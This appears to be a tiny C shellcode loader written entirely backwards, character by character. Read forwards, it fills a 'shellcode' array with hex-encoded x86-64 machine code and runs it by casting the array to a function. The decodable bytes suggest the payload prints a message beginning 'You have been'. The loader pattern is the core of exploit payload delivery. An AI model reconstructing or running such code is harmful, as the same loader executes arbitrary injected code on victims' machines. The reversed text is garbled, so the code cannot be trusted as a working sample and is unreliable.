
} ;)()edocllehs))()*( diov(( { )diov(niam tni
;"00x\00x\00x\00x\"    

"00x\00x\00x\c1x\00x\00x\00x\41x\00x\00x\10x\09x\"    
"00x\00x\00x\00x\00x\00x\00x\75x\ffx\ffx\ffx\88x\"    
"00x\00x\00x\00x\00x\00x\00x\41x\00x\3cx\50x\f0x\"    
"80x\70x\c0x\b1x\10x\01x\87x\10x\00x\25x\a7x\10x\"    
"10x\8bx\0fx\42x\44x\98x\66x\00x\00x\00x\a0x\8bx\"    
"00x\00x\00x\c3x\8bx\ffx\13x\50x\f0x\00x\00x\00x\"    
"27x\8bx\84x\0ex\42x\44x\98x\84x\00x\00x\00x\a1x\"    
"8ex\42x\44x\98x\84x\12x\46x\72x\33x\26x\d6x\43x\"    
"42x\44x\98x\84x\8dx\42x\47x\d8x\84x\00x\00x\00x\"    
"abx\43x\86x\02x\e6x\56x\56x\26x\02x\8bx\84x\8dx\"    
= ][edocllehs rahc
"10x\fbx\56x\67x\16x\86x\02x\57x\f6x\95x\8bx\84x\"    